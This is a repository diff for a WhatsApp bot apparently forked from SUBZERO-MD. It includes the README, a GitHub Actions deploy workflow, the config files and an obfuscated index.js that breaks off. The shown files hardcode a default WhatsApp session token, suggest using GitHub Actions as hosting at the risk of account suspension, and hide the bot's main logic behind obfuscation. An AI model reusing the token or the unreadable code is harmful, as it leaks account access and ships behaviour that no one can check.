<p style="text-align: center; font-size: 1.2em;">
|
231 |
+
|
232 |
+
<p align="center">
|
233 |
+
<a href='https://replit.com/~' target="_blank"><img alt='Replit' src='https://img.shields.io/badge/-Replit Deploy-1976D2?style=for-the-badge&logo=replit&logoColor=white'/< width=150 height=28/p></a> </a>
|
234 |
+
|
235 |
+
--------
|
236 |
+
<h4 align="center">8. Workflow</h4>
|
237 |
+
<p style="text-align: center; font-size: 1.2em;">
|
238 |
+
|
239 |
+
|
240 |
+
<details>
|
241 |
+
|
242 |
+
<b><strong><summary align="center" style="color: Yello;">Deploy On Workflow</summary></strong></b>
|
243 |
+
<p style="text-align: center; font-size: 1.2em;">
|
244 |
+
|
245 |
+
<h8>Copy the workflow codes and then frok the repo edit config add session id then save and now click on repo action tag then click on start new workflow then paste workflow codes name them deploy and save the file</h8>
|
246 |
+
<h3 align-"center"> Important</h3>
|
247 |
+
<h6 align-"center">Attention! We do not take responsibility if your github account is suspended through this Deploy method, I advise you not to use this workflow deploy method in the latest github accounts, github accounts created a year or more ago have not received the risk of suspension so far, this works It will only be done for 6 hours, you need to update the code to reactivate it.</h6>
|
248 |
+
|
249 |
+
```
|
250 |
+
name: Node.js CI
|
251 |
+
|
252 |
+
on:
|
253 |
+
push:
|
254 |
+
branches:
|
255 |
+
- main
|
256 |
+
pull_request:
|
257 |
+
branches:
|
258 |
+
- main
|
259 |
+
|
260 |
+
jobs:
|
261 |
+
build:
|
262 |
+
|
263 |
+
runs-on: ubuntu-latest
|
264 |
+
|
265 |
+
strategy:
|
266 |
+
matrix:
|
267 |
+
node-version: [20.x]
|
268 |
+
|
269 |
+
steps:
|
270 |
+
- name: Checkout repository
|
271 |
+
uses: actions/checkout@v3
|
272 |
+
|
273 |
+
- name: Set up Node.js
|
274 |
+
uses: actions/setup-node@v3
|
275 |
+
with:
|
276 |
+
node-version: ${{ matrix.node-version }}
|
277 |
+
|
278 |
+
- name: Install dependencies
|
279 |
+
run: npm install
|
280 |
+
|
281 |
+
- name: Start application
|
282 |
+
run: npm start
|
283 |
+
```
|
284 |
+
</details>
|
285 |
+
|
286 |
+
***
|
287 |
+
|
288 |
+
|
289 |
+
|
290 |
+
|
291 |
+
## 🌐 WhatsApp Channel
|
292 |
+
|
293 |
+
Stay connected with the latest updates and community by joining our official WhatsApp group and channel. You can also contact the owner directly.
|
294 |
+
|
295 |
+
[](https://whatsapp.com/channel/0029VagQEmB002T7MWo3Sj1D)
|
296 |
+
|
297 |
+
***
|
298 |
+
|
299 |
+
<h2 align="left">⚠️ Reminder ⚠️</h2>
|
300 |
+
<p style="text-align: center; font-size: 1.2em;">
|
301 |
+
|
302 |
+
- **Disclaimer:** This bot is not affiliated with `WhatsApp Inc.`. Use it at your own risk.
|
303 |
+
- Misusing the bot may result in your `WhatsApp` account being banned. Note that you can only unban your account once.
|
304 |
+
- I am not responsible for any bans or misuse of the bot. Please keep this warning in mind before proceeding.
|
305 |
+
|
306 |
+
---
|
307 |
+
|
308 |
+
<h2 align="left">ℹ️ Notice</h2>
|
309 |
+
<p style="text-align: center; font-size: 1.2em;">
|
310 |
+
Not For Sale - If any plugin's code is obfuscated, you do not have permission to edit it in any form. Please remember to give credit if you are using or re-uploading my plugins/files. Wishing you a wonderful day ahead!</p>
|
311 |
+
|
312 |
+
---
|
313 |
+
|
314 |
+
<h2 align="center"> Project Owners </h2>
|
315 |
+
|
316 |
+
---
|
317 |
+
|
318 |
+
### Thank You Dear
|
319 |
+
|
320 |
+
> DEVELOPER OF SUBZERO-MD
|
321 |
+
- [Mr Frank ](https://github.com/mrfrank-ofc)
|
322 |
+
- Creater and Owner Of SUBZERO-MD
|
323 |
+
|
324 |
+
> SUBZERO-MD Helper
|
325 |
+
- [Frank](https://github.com/efkidgamerdev)
|
326 |
+
- For helping in bot plugin files.
|
327 |
+
---
|
328 |
+
|
329 |
+
<br>
|
330 |
+
<h2 align="center"> ⚠️ Disclaimer ⚠️
|
331 |
+
</h2>
|
332 |
+
|
333 |
+
---
|
334 |
+
|
335 |
+
<h3 align="center"> Don't Copy Without Permission
|
336 |
+
</h3>
|
337 |
+
|
338 |
+
<br>
|
339 |
+
|
340 |
+
```
|
341 |
+
Thank you Pikachu, KHAN, SILENT SOBX, KERM & you supporters
|
342 |
+
```
|
343 |
+
-----
|
344 |
+
<a><img src='https://i.imgur.com/LyHic3i.gif'/></a>
|
345 |
+
|
346 |
+
------
|
app.json
ADDED
@@ -0,0 +1,182 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"name": "Encrypto-MD",
|
3 |
+
"description": "A rich whatsapp bot by Dudas",
|
4 |
+
"logo": "https://i.ibb.co/zxgrymc/IMG-20250113-WA0336.jpg",
|
5 |
+
"keywords": ["encrypto-bot"],
|
6 |
+
"success_url": "/",
|
7 |
+
|
8 |
+
"stack": "container",
|
9 |
+
"env": {
|
10 |
+
"SESSION_ID": {
|
11 |
+
"description": "Put the your Encrypto session-id here.",
|
12 |
+
"required": true,
|
13 |
+
"value": ""
|
14 |
+
},
|
15 |
+
|
16 |
+
"ALIVE_IMG": {
|
17 |
+
"description": "paste your image url if you don't have you can use this public url.",
|
18 |
+
"required": false,
|
19 |
+
"value": "https://i.ibb.co/zxgrymc/IMG-20250113-WA0336.jpg"
|
20 |
+
},
|
21 |
+
|
22 |
+
"LIVE_MSG": {
|
23 |
+
"description": "paste your alive message hear.",
|
24 |
+
"required": false,
|
25 |
+
"value": "> [❄️] Encrypto-27 MD Is Online ⚡"
|
26 |
+
},
|
27 |
+
|
28 |
+
"PREFIX": {
|
29 |
+
"description": "paste your bot prefix note! Don't apply null prefix.",
|
30 |
+
"required": false,
|
31 |
+
"value": "."
|
32 |
+
},
|
33 |
+
|
34 |
+
"MODE": {
|
35 |
+
"description": "select your bot work type public-private-inbox-group.",
|
36 |
+
"required": false,
|
37 |
+
"value": "public"
|
38 |
+
|
39 |
+
},
|
40 |
+
|
41 |
+
|
42 |
+
"ALWAYS_ONLINE": {
|
43 |
+
"description": "Make it true if want always online.",
|
44 |
+
"required": false,
|
45 |
+
"value": "false"
|
46 |
+
},
|
47 |
+
|
48 |
+
"AUTO_VOICE": {
|
49 |
+
"description": "Make it true if want automatic voice reply .",
|
50 |
+
"required": false,
|
51 |
+
"value": "false"
|
52 |
+
},
|
53 |
+
|
54 |
+
"AUTO_REPLY": {
|
55 |
+
"description": "Make it true if you want automatic reply.",
|
56 |
+
"required": false,
|
57 |
+
"value": "true"
|
58 |
+
},
|
59 |
+
|
60 |
+
"AUTO_STICKER": {
|
61 |
+
"description": "Make it true if you want automatic sticker.",
|
62 |
+
"required": false,
|
63 |
+
"value": "false"
|
64 |
+
},
|
65 |
+
|
66 |
+
|
67 |
+
"AUTO_STATUS_SEEN": {
|
68 |
+
"description": "Make it true for automatic status seen.",
|
69 |
+
"required": true,
|
70 |
+
"value": "true"
|
71 |
+
},
|
72 |
+
|
73 |
+
"AUTO_STATUS_REPLY": {
|
74 |
+
"description": "Make it true for auto reply msg on status seen.",
|
75 |
+
"required": true,
|
76 |
+
"value": "true"
|
77 |
+
},
|
78 |
+
|
79 |
+
"AUTO_STATUS_MSG": {
|
80 |
+
"description": "Type custom message on status reply",
|
81 |
+
"required": true,
|
82 |
+
"value": "*Encrypto VIEWED YOUR STATUS 🧸*"
|
83 |
+
},
|
84 |
+
|
85 |
+
"OWNER_NAME": {
|
86 |
+
"description": "Type Bot Owner Name.",
|
87 |
+
"required": false,
|
88 |
+
"value": "Dudas"
|
89 |
+
},
|
90 |
+
|
91 |
+
"OWNER_NUMBER": {
|
92 |
+
"description": "put the owner number for bot.",
|
93 |
+
"required": false,
|
94 |
+
"value": "27679291800"
|
95 |
+
|
96 |
+
},
|
97 |
+
|
98 |
+
"BOT_NAME": {
|
99 |
+
"description": "Type here the bot name.",
|
100 |
+
"required": false,
|
101 |
+
"value": "『 Encrypto27 - AI 』"
|
102 |
+
|
103 |
+
},
|
104 |
+
|
105 |
+
"ANTI_LINK": {
|
106 |
+
"description": "Make it true if you want bot auto remove group link.",
|
107 |
+
"required": true,
|
108 |
+
"value": "true"
|
109 |
+
|
110 |
+
},
|
111 |
+
|
112 |
+
"ANTI_BAD": {
|
113 |
+
"description": "Make it true if you want bot auto delete bad words.",
|
114 |
+
"required": false,
|
115 |
+
"value": "false"
|
116 |
+
},
|
117 |
+
|
118 |
+
"DESCRIPTION": {
|
119 |
+
"description": "add caption for menu and other",
|
120 |
+
"required": false,
|
121 |
+
"value": "*Encrypto-27 AI Technologies*"
|
122 |
+
},
|
123 |
+
|
124 |
+
"DELETE_LINKS": {
|
125 |
+
"description": "remove links from group automatically without removing member",
|
126 |
+
"required": false,
|
127 |
+
"value": "true"
|
128 |
+
},
|
129 |
+
|
130 |
+
"AUTO_RECORDING": {
|
131 |
+
"description": "Make it true if you want auto recoding.",
|
132 |
+
"required": false,
|
133 |
+
"value": "false"
|
134 |
+
},
|
135 |
+
|
136 |
+
"AUTO_TYPING": {
|
137 |
+
"description": "Make it true if you want auto typing.",
|
138 |
+
"required": false,
|
139 |
+
"value": "false"
|
140 |
+
},
|
141 |
+
|
142 |
+
"AUTO_REACT": {
|
143 |
+
"description": "Make it true if you want react on every message.",
|
144 |
+
"required": false,
|
145 |
+
"value": "false"
|
146 |
+
},
|
147 |
+
|
148 |
+
"CUSTOM_REACT": {
|
149 |
+
"description": "Make it true if you want custom reactions.",
|
150 |
+
"required": false,
|
151 |
+
"value": "false"
|
152 |
+
|
153 |
+
},
|
154 |
+
|
155 |
+
"CUSTOM_REACT_EMOJIS": {
|
156 |
+
"description": "put here custom react react emojis.",
|
157 |
+
"required": false,
|
158 |
+
"value": "💝,💖,💗,❤️🩹,❤️,🧡,💛,💚,💙,💜,🤎,🖤,🤍"
|
159 |
+
},
|
160 |
+
|
161 |
+
"READ_CMD": {
|
162 |
+
"description": "make it true if want mark commands as read.",
|
163 |
+
"required": false,
|
164 |
+
"value": "true"
|
165 |
+
},
|
166 |
+
|
167 |
+
"READ_MESSAGE": {
|
168 |
+
"description": "Make it true if you want bot read your all sms just now.",
|
169 |
+
"required": false,
|
170 |
+
"value": "false"
|
171 |
+
}
|
172 |
+
|
173 |
+
},
|
174 |
+
|
175 |
+
"buildpacks": [
|
176 |
+
{
|
177 |
+
"url": "https://github.com/heroku/heroku-buildpack-nodejs.git"
|
178 |
+
}
|
179 |
+
],
|
180 |
+
"stack": "heroku-24"
|
181 |
+
}
|
182 |
+
|
command.js
ADDED
@@ -0,0 +1,20 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
var commands = [];
|
2 |
+
|
3 |
+
function cmd(info, func) {
|
4 |
+
var data = info;
|
5 |
+
data.function = func;
|
6 |
+
if (!data.dontAddCommandList) data.dontAddCommandList = false;
|
7 |
+
if (!info.desc) info.desc = '';
|
8 |
+
if (!data.fromMe) data.fromMe = false;
|
9 |
+
if (!info.category) data.category = 'misc';
|
10 |
+
if(!info.filename) data.filename = "Not Provided";
|
11 |
+
commands.push(data);
|
12 |
+
return data;
|
13 |
+
}
|
14 |
+
module.exports = {
|
15 |
+
cmd,
|
16 |
+
AddCommand:cmd,
|
17 |
+
Function:cmd,
|
18 |
+
Module:cmd,
|
19 |
+
commands,
|
20 |
+
};
|
config.js
ADDED
@@ -0,0 +1,104 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
const fs = require('fs');
|
19 |
+
if (fs.existsSync('config.env')) require('dotenv').config({ path: './config.env' });
|
20 |
+
|
21 |
+
function convertToBool(text, fault = 'true') {
|
22 |
+
return text === fault ? true : false;
|
23 |
+
}
|
24 |
+
module.exports = {
|
25 |
+
SESSION_ID: process.env.SESSION_ID || "SUBZERO-MD~7yogBJBR#-QICd24CH7t6MC9AJ1Jpmog99gw404C2NfapqOgFTcg",
|
26 |
+
|
27 |
+
PREFIX: process.env.PREFIX || ".",
|
28 |
+
// Enter Your Desired Prefix
|
29 |
+
|
30 |
+
BOT_NAME: process.env.BOT_NAME || "『 Encrypto-27 AI 』",
|
31 |
+
// Enter Your Bot Name
|
32 |
+
|
33 |
+
CUSTOM_REACT: process.env.CUSTOM_REACT || "false",
|
34 |
+
// make this true for custum emoji react
|
35 |
+
|
36 |
+
CUSTOM_REACT_EMOJIS: process.env.CUSTOM_REACT_EMOJIS || "💝,💖,💗,❤️🩹,❤️,🧡,💛,💚,💙,💜,🤎,🖤,🤍",
|
37 |
+
// chose custom react emojis by yourself
|
38 |
+
|
39 |
+
DELETE_LINKS: process.env.DELETE_LINKS || "false",
|
40 |
+
// automatic delete links witho remove member
|
41 |
+
|
42 |
+
OWNER_NUMBER: process.env.OWNER_NUMBER || "263719647303",
|
43 |
+
// Set Owner Name
|
44 |
+
|
45 |
+
OWNER_NAME: process.env.OWNER_NAME || "ᴍʀ ꜰʀᴀɴᴋ ᴏꜰᴄ",
|
46 |
+
// Set Footer
|
47 |
+
|
48 |
+
DESCRIPTION: process.env.DESCRIPTION || "*© Gᴇɴᴇʀᴀᴛᴇᴅ ʙʏ Sᴜʙᴢᴇʀᴏ*",
|
49 |
+
// add bot owner name
|
50 |
+
|
51 |
+
ALIVE_IMG: process.env.ALIVE_IMG || "https://i.ibb.co/YkJyMRb/mrfrankofc.jpg",
|
52 |
+
// add img for alive msg
|
53 |
+
|
54 |
+
LIVE_MSG: process.env.LIVE_MSG || "> [🎐] SᴜʙZᴇʀᴏ MD ɪs ᴏɴʟɪɴᴇ*⚡",
|
55 |
+
// add alive msg here
|
56 |
+
|
57 |
+
READ_MESSAGE: process.env.READ_MESSAGE || "false",
|
58 |
+
// Turn true or false for automatic read msgs
|
59 |
+
|
60 |
+
AUTO_REACT: process.env.AUTO_REACT || "false",
|
61 |
+
// make this true or false for auto react on all msgs
|
62 |
+
|
63 |
+
ANTI_BAD: process.env.ANTI_BAD || "false",
|
64 |
+
// false or true for anti bad words
|
65 |
+
|
66 |
+
AUTO_STATUS_SEEN: process.env.AUTO_STATUS_SEEN || "true",
|
67 |
+
// make true or false status auto seen
|
68 |
+
|
69 |
+
AUTO_STATUS_REPLY: process.env.AUTO_STATUS_REPLY || "false",
|
70 |
+
// make true if you want auto reply on status
|
71 |
+
|
72 |
+
AUTO_STATUS_MSG: process.env.AUTO_STATUS__MSG || "*[❄️] Hi there, SUBZERO-MD viewed your Status🎐*",
|
73 |
+
|
74 |
+
// set the auto reply massage on status reply
|
75 |
+
MODE: process.env.MODE || "public",
|
76 |
+
// make bot public-private-inbox-group
|
77 |
+
|
78 |
+
ANTI_LINK: process.env.ANTI_LINK || "true",
|
79 |
+
// make anti link true,false for groups
|
80 |
+
|
81 |
+
AUTO_VOICE: process.env.AUTO_VOICE || "false",
|
82 |
+
// make true for send automatic voices
|
83 |
+
|
84 |
+
AUTO_STICKER: process.env.AUTO_STICKER || "false",
|
85 |
+
// make true for automatic stickers
|
86 |
+
|
87 |
+
AUTO_REPLY: process.env.AUTO_REPLY || "false",
|
88 |
+
// make true or false automatic text reply
|
89 |
+
|
90 |
+
ALWAYS_ONLINE: process.env.ALWAYS_ONLINE || "false",
|
91 |
+
// maks true for always online
|
92 |
+
|
93 |
+
PUBLIC_MODE: process.env.PUBLIC_MODE || "true",
|
94 |
+
// make false if want private mod
|
95 |
+
|
96 |
+
AUTO_TYPING: process.env.AUTO_TYPING || "false",
|
97 |
+
// true for automatic show typing
|
98 |
+
|
99 |
+
READ_CMD: process.env.READ_CMD || "true",
|
100 |
+
// true if want mark commands as read
|
101 |
+
|
102 |
+
AUTO_RECORDING: process.env.AUTO_RECORDING || "false"
|
103 |
+
// make it true for auto recoding
|
104 |
+
};
|
data/Readme.md
ADDED
@@ -0,0 +1 @@
|
|
|
|
|
1 |
+
## ENCRYPTO27 W.A BOT
|
data/autoreply.json
ADDED
@@ -0,0 +1,17 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"Hi":"*Wassup*...? *How are You..!*",
|
3 |
+
"Good Morning":"*Good Morning 🌅*",
|
4 |
+
"Good Night":"*Good Night..🌉*",
|
5 |
+
"Bye":"*Bye bye....*",
|
6 |
+
"Makadii":"> *Wangu wadii❤🔥🤌🏻*",
|
7 |
+
"owner":"*Encrypto-27 🫀",
|
8 |
+
"Darrell":"Thats my handsome owner.🥰",
|
9 |
+
"Repo":"*Please follow me here bro\n\n *YT: @mrfr4nk*\n*Github:github.com/diegoallies*",
|
10 |
+
"detect":"*This Bot Is A Copy Of Encrypto-27 AI Made by Dudas this user stole it*",
|
11 |
+
"Encrypto27":"*Hello how can i assist you?😣*",
|
12 |
+
"South Africa":"*Best Country Ever🇿🇼☺*",
|
13 |
+
"Dudas":"> *Thats My Daddy, who are you?🌚*",
|
14 |
+
"dee":"*Chibaba ndakaipa ini🙌😂*",
|
15 |
+
"Hey":"*Hi human*",
|
16 |
+
"love":"*Luv you too mate 💗😁*"
|
17 |
+
}
|
data/autosticker.json
ADDED
@@ -0,0 +1,7 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"bye":"https://github.com/JawadYTX/KHAN-DATA/raw/refs/heads/main/autosticker/STK-20241108-WA0028.webp",
|
3 |
+
"love":"https://github.com/JawadYTX/KHAN-DATA/raw/refs/heads/main/autosticker/STK-20241110-WA0007.webp",
|
4 |
+
"shy":"https://github.com/JawadYTX/KHAN-DATA/raw/refs/heads/main/autosticker/STK-20241110-WA0008.webp",
|
5 |
+
"hit":"https://github.com/JawadYTX/KHAN-DATA/raw/refs/heads/main/autosticker/STK-20241110-WA0004.webp",
|
6 |
+
"hi":"https://github.com/JawadYTX/KHAN-DATA/raw/refs/heads/main/autosticker/STK-20241110-WA0002.webp"
|
7 |
+
}
|
data/autovoice.json
ADDED
@@ -0,0 +1,37 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"DJ":"https://github.com/JawadYTX/KHAN-DATA/raw/refs/heads/main/autovoice/menu.m4a",
|
3 |
+
"Imran":"https://github.com/JawadYTX/KHAN-DATA/raw/refs/heads/main/autovoice/sigma.m4a",
|
4 |
+
"zinda":"https://github.com/JawadYTX/KHAN-DATA/raw/refs/heads/main/autovoice/alive.m4a",
|
5 |
+
"hi":"https://github.com/JawadYTX/KHAN-DATA/raw/refs/heads/main/autovoice/hi.m4a",
|
6 |
+
"helo":"https://github.com/JawadYTX/KHAN-DATA/raw/refs/heads/main/autovoice/hello.m4a",
|
7 |
+
"good morning":"https://github.com/JawadYTX/KHAN-DATA/raw/refs/heads/main/autovoice/gm.m4a",
|
8 |
+
"haha":"https://github.com/JawadYTX/KHAN-DATA/raw/refs/heads/main/autovoice/haha.m4a",
|
9 |
+
"bye":"https://github.com/JawadYTX/KHAN-DATA/raw/refs/heads/main/autovoice/bye.m4a",
|
10 |
+
"i love you":"https://github.com/JawadYTX/KHAN-DATA/raw/refs/heads/main/autovoice/love.m4a",
|
11 |
+
"don":"https://github.com/JawadYTX/KHAN-DATA/raw/refs/heads/main/autovoice/repo.m4a",
|
12 |
+
"oya":"https://github.com/JawadYTX/KHAN-DATA/raw/refs/heads/main/autovoice/repo.m4a",
|
13 |
+
"thanku":"https://github.com/JawadYTX/KHAN-DATA/raw/refs/heads/main/autovoice/thanks.m4a",
|
14 |
+
"sigma":"https://github.com/JawadYTX/KHAN-DATA/raw/refs/heads/main/autovoice/sigma.m4a",
|
15 |
+
"jan":"https://github.com/JawadYTX/KHAN-DATA/raw/refs/heads/main/autovoice/sigma.m4a",
|
16 |
+
".ping2":"https://github.com/JawadYTX/KHAN-DATA/raw/refs/heads/main/autovoice/contact.m4a",
|
17 |
+
"joun":"https://github.com/sadiyamin/alexa-database/raw/refs/heads/main/Media/pakaya.m4a",
|
18 |
+
"nice":"https://github.com/sadiyamin/alexa-database/raw/refs/heads/main/Media/pakaya.m4a",
|
19 |
+
"by":"https://github.com/sadiyamin/alexa-database/raw/refs/heads/main/Media/pakaya.m4a",
|
20 |
+
"hehe":"https://github.com/VajiraTech/IZUMI-AUTO-VOICER/raw/main/Ponnaya(tbg).m4a",
|
21 |
+
"oka":"https://github.com/VajiraTech/IZUMI-AUTO-VOICER/raw/main/kawa.m4a",
|
22 |
+
"wow":"https://github.com/VajiraTech/IZUMI-AUTO-VOICER/raw/main/kellek%20oni.m4a",
|
23 |
+
"geo":"https://github.com/VajiraTech/IZUMI-AUTO-VOICER/raw/main/wesi(tbg).m4a",
|
24 |
+
"love":"https://github.com/sadiyamin/alexa-database/raw/refs/heads/main/Media/i_love_you.m4a",
|
25 |
+
"love you":"https://github.com/sadiyamin/alexa-database/raw/refs/heads/main/Media/i_love_you.m4a",
|
26 |
+
"ohh":"https://github.com/sadiyamin/alexa-database/raw/refs/heads/main/Media/i_love_you.m4a",
|
27 |
+
"dear":"https://github.com/sadiyamin/alexa-database/raw/refs/heads/main/Media/pakaya.m4a",
|
28 |
+
"sir":"https://github.com/sadiyamin/alexa-database/raw/refs/heads/main/Media/pakaya.m4a",
|
29 |
+
"hm":"https://github.com/tharumin/Alexa_Voice/raw/refs/heads/main/hm.m4a",
|
30 |
+
"hmm":"https://github.com/tharumin/Alexa_Voice/raw/refs/heads/main/hm.m4a",
|
31 |
+
"aww":"https://github.com/tharumin/Alexa_Voice/raw/refs/heads/main/hm.m4a",
|
32 |
+
"oye":"https://github.com/tharumin/Alexa_Voice/raw/refs/heads/main/oya_kawada.m4a",
|
33 |
+
"ustad":"https://github.com/tharumin/Alexa_Voice/raw/refs/heads/main/oya_kawada.m4a",
|
34 |
+
"molning":"https://github.com/sadiyamin/alexa-database/raw/refs/heads/main/Media/good_morning.m4a",
|
35 |
+
"night":"https://github.com/sadiyamin/alexa-database/raw/refs/heads/main/Media/good_night.m4a",
|
36 |
+
"good night":"https://github.com/sadiyamin/alexa-database/raw/refs/heads/main/Media/good_night.m4a"
|
37 |
+
}
|
index.js
ADDED
@@ -0,0 +1,5 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
// fuck you cloner
|
2 |
+
|
3 |
+
|
4 |
+
|
5 |
+
function _0x2d14(_0x3880ca,_0x3e4f56){const _0x36f515=_0x36f5();return _0x2d14=function(_0x2d1407,_0x4afb8f){_0x2d1407=_0x2d1407-0x186;let _0x2c2b1b=_0x36f515[_0x2d1407];return _0x2c2b1b;},_0x2d14(_0x3880ca,_0x3e4f56);}const _0x54ff3b=_0x2d14;(function(_0x4fa01e,_0x4b7e52){const _0x2b7734=_0x2d14,_0x4d5b13=_0x4fa01e();while(!![]){try{const _0x104ed3=-parseInt(_0x2b7734(0x1f0))/0x1*(parseInt(_0x2b7734(0x1fd))/0x2)+-parseInt(_0x2b7734(0x2eb))/0x3*(-parseInt(_0x2b7734(0x1ea))/0x4)+parseInt(_0x2b7734(0x1cb))/0x5*(parseInt(_0x2b7734(0x215))/0x6)+-parseInt(_0x2b7734(0x316))/0x7+-parseInt(_0x2b7734(0x200))/0x8+-parseInt(_0x2b7734(0x232))/0x9*(-parseInt(_0x2b7734(0x26e))/0xa)+parseInt(_0x2b7734(0x209))/0xb;if(_0x104ed3===_0x4b7e52)break;else _0x4d5b13['push'](_0x4d5b13['shift']());}catch(_0x3685d9){_0x4d5b13['push'](_0x4d5b13['shift']());}}}(_0x36f5,0x88140));function hi(){const _0x1546f0=_0x2d14;console[_0x1546f0(0x2c1)](_0x1546f0(0x1b1));}hi();const {default:makeWASocket,useMultiFileAuthState,DisconnectReason,jidNormalizedUser,getContentType,proto,generateWAMessageContent,generateWAMessage,AnyMessageContent,prepareWAMessageMedia,areJidsSameUser,downloadContentFromMessage,MessageRetryMap,generateForwardMessageContent,generateWAMessageFromContent,generateMessageID,makeInMemoryStore,jidDecode,fetchLatestBaileysVersion,Browsers}=require(_0x54ff3b(0x1d6)),l=console[_0x54ff3b(0x2c1)],{getBuffer,getGroupAdmins,getRandom,h2k,isUrl,Json,runtime,sleep,fetchJson}=require(_0x54ff3b(0x32b)),fs=require('fs'),ff=require(_0x54ff3b(0x1d1)),P=require(_0x54ff3b(0x25f)),config=require(_0x54ff3b(0x2ee)),qrcode=require(_0x54ff3b(0x30f)),StickersTypes=require(_0x54ff3b(0x18a)),util=require(_0x54ff3b(0x295)),{sms,downloadMediaMessage}=require(_0x54ff3b(0x2ff)),FileType=require(_0x54ff3b(0x268)),axios=require('axios'),{File}=require(_0x54ff3b(0x251)),{fromBuffer}=require(_0x54ff3b(0x268)),bodyparser=require(_0x54ff3b(0x2c0)),os=require('os'),Crypto=require(_0x54ff3b(0x28b)),path=require(_0x54ff3b(0x2e7)),prefix=config[_0x54ff3b(0x241)],ownerNumber=[_0x54ff3b(0x2f1)],tempDir=path[_0x54ff3b(0x22f)](os['tmpdir'](),'cache-temp');!fs[_0x54ff3b(0x2be)](tempDir)&&fs[_0x54ff3b(0x26f)](tempDir);const clearTempDir=()=>{const _0x14f493=_0x54ff3b;fs[_0x14f493(0x235)](tempDir,(_0x4e7cc1,_0x31db60)=>{const _0x2b710f=_0x14f493;if(_0x4e7cc1)throw _0x4e7cc1;for(const _0x4370b3 of _0x31db60){fs[_0x2b710f(0x332)](path[_0x2b710f(0x22f)](tempDir,_0x4370b3),_0x38048c=>{if(_0x38048c)throw _0x38048c;});}});};setInterval(clearTempDir,0x5*0x3c*0x3e8);if(!fs[_0x54ff3b(0x2be)](__dirname+_0x54ff3b(0x1f2))){if(!config[_0x54ff3b(0x265)])return console[_0x54ff3b(0x2c1)](_0x54ff3b(0x1d8));const sessdata=config['SESSION_ID'][_0x54ff3b(0x325)]('SUBZERO-MD~',''),filer=File['fromURL'](_0x54ff3b(0x2fc)+sessdata);filer[_0x54ff3b(0x20c)]((_0x1e6cd2,_0x1fbb0a)=>{const _0x5d49cc=_0x54ff3b;if(_0x1e6cd2)throw _0x1e6cd2;fs[_0x5d49cc(0x1d5)](__dirname+_0x5d49cc(0x1f2),_0x1fbb0a,()=>{const 